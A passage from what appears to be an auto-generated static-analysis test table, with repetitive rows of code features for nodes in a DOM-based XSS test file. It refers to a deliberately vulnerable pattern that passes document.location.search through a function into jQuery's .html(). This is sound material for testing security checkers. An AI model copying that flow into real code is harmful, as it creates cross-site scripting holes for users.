element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:38:1 | 'arguments' object of function baz | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:38:1 | 'arguments' object of function baz | enclosingFunctionBody | x x | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:38:1 | 'arguments' object of function baz | enclosingFunctionName | baz | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:38:1 | 'arguments' object of function baz | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:38:1 | exceptional return of function baz | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:38:1 | exceptional return of function baz | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:38:1 | exceptional return of function baz | enclosingFunctionBody | x x | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:38:1 | exceptional return of function baz | enclosingFunctionName | baz | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:38:1 | exceptional return of function baz | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:38:1 | functio ... rn x;\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:38:1 | functio ... rn x;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:38:1 | functio ... rn x;\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:38:1 | return of function baz | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:38:1 | return of function baz | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:38:1 | return of function baz | enclosingFunctionBody | x x | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:38:1 | return of function baz | enclosingFunctionName | baz | +| autogenerated/Xss/DomBasedXss/tst.js:36:1:38:1 | return of function baz | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:36:10:36:12 | baz | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:36:10:36:12 | baz | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:36:10:36:12 | baz | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:36:10:36:12 | baz | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/tst.js:36:10:36:12 | baz | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:36:10:36:12 | baz | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:36:14:36:14 | x | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:36:14:36:14 | x | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:36:14:36:14 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:36:14:36:14 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/tst.js:36:14:36:14 | x | enclosingFunctionBody | x x | +| autogenerated/Xss/DomBasedXss/tst.js:36:14:36:14 | x | enclosingFunctionBody | x x | +| autogenerated/Xss/DomBasedXss/tst.js:36:14:36:14 | x | enclosingFunctionName | baz | +| autogenerated/Xss/DomBasedXss/tst.js:36:14:36:14 | x | enclosingFunctionName | baz | +| autogenerated/Xss/DomBasedXss/tst.js:36:14:36:14 | x | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:36:14:36:14 | x | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:37:10:37:10 | x | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:37:10:37:10 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/DomBasedXss/tst.js:37:10:37:10 | x | enclosingFunctionBody | x x | +| autogenerated/Xss/DomBasedXss/tst.js:37:10:37:10 | x | enclosingFunctionName | baz | +| autogenerated/Xss/DomBasedXss/tst.js:37:10:37:10 | x | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:40:1:40:1 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:40:1:40:1 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:40:1:40:1 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:40:1:40:9 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:40:1:40:9 | $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:40:1:40:9 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:40:1:40:9 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:40:1:40:9 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:40:1:40:9 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:40:1:40:14 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:40:1:40:14 | $('myId').html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:40:1:40:14 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:40:1:40:45 | $('myId ... earch)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:40:1:40:45 | $('myId ... earch)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:40:1:40:45 | $('myId ... earch)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:40:1:40:45 | exceptional return of $('myId ... earch)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:40:1:40:45 | exceptional return of $('myId ... earch)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:40:1:40:45 | exceptional return of $('myId ... earch)) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:40:3:40:8 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:40:3:40:8 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:40:3:40:8 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:40:3:40:8 | 'myId' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:40:3:40:8 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:40:11:40:14 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:40:11:40:14 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:40:11:40:14 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:40:16:40:18 | baz | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:40:16:40:18 | baz | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:40:16:40:18 | baz | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:40:16:40:44 | baz(doc ... search) | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:40:16:40:44 | baz(doc ... search) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:40:16:40:44 | baz(doc ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:40:16:40:44 | baz(doc ... search) | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:40:16:40:44 | baz(doc ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:40:16:40:44 | exceptional return of baz(doc ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:40:16:40:44 | exceptional return of baz(doc ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:40:16:40:44 | exceptional return of baz(doc ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:40:20:40:27 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:40:20:40:27 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:40:20:40:27 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:40:20:40:36 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:40:20:40:36 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:40:20:40:36 | document.location | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:40:20:40:43 | documen ... .search | CalleeFlexibleAccessPath | baz | | autogenerated/Xss/DomBasedXss/tst.js:40:20:40:43 | documen ... .search | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:40:20:40:43 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:40:20:40:43 | documen ... .search | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:40:20:40:43 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:40:29:40:36 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:40:29:40:36 | location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:40:29:40:36 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:40:38:40:43 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:40:38:40:43 | search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:40:38:40:43 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:42:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:42:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:42:0 | this | enclosingFunctionBody | s
    s
    | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:42:0 | this | enclosingFunctionName | wrap | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:42:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:44:1 | 'arguments' object of function wrap | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:44:1 | 'arguments' object of function wrap | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:42:1:44:1 | 'arguments' object of function wrap | enclosingFunctionBody | s
    s
